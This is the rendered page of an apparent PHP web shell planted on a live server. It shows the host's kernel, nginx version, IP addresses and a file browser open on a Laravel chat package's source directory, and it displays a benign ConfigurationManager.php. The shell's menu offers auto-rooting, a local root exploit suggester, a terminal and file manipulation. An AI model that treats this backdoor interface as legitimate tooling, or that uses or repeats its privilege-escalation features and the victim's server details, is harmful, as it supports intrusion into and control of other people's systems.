Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.19.255.50
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
vendor /
musonza /
chat /
src /
Delete
Unzip
Name
Size
Permission
Date
Action
Commanding
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Eventing
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Exceptions
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Facades
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Http
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Messages
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Models
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Notifications
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Services
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Traits
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
Transformers
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
ValueObjects
[ DIR ]
drwxr-xr-x
2020-04-08 12:13
BaseModel.php
145
B
-rw-r--r--
2020-04-08 12:13
Chat.php
3.2
KB
-rw-r--r--
2020-04-08 12:13
ChatServiceProvider.php
1.57
KB
-rwxr-xr-x
2020-04-08 12:13
ConfigurationManager.php
732
B
-rw-r--r--
2020-04-08 12:13
Save
Rename
<?php namespace Musonza\Chat; class ConfigurationManager { const CONVERSATIONS_TABLE = 'chat_conversations'; const MESSAGES_TABLE = 'chat_messages'; const MESSAGE_NOTIFICATIONS_TABLE = 'chat_message_notifications'; const PARTICIPATION_TABLE = 'chat_participation'; public static function paginationDefaultParameters() { $pagination = config('musonza_chat.pagination', []); return [ 'page' => $pagination['page'] ?? 1, 'perPage' => $pagination['perPage'] ?? 25, 'sorting' => $pagination['sorting'] ?? 'asc', 'columns' => $pagination['columns'] ?? ['*'], 'pageName' => $pagination['pageName'] ?? 'page', ]; } }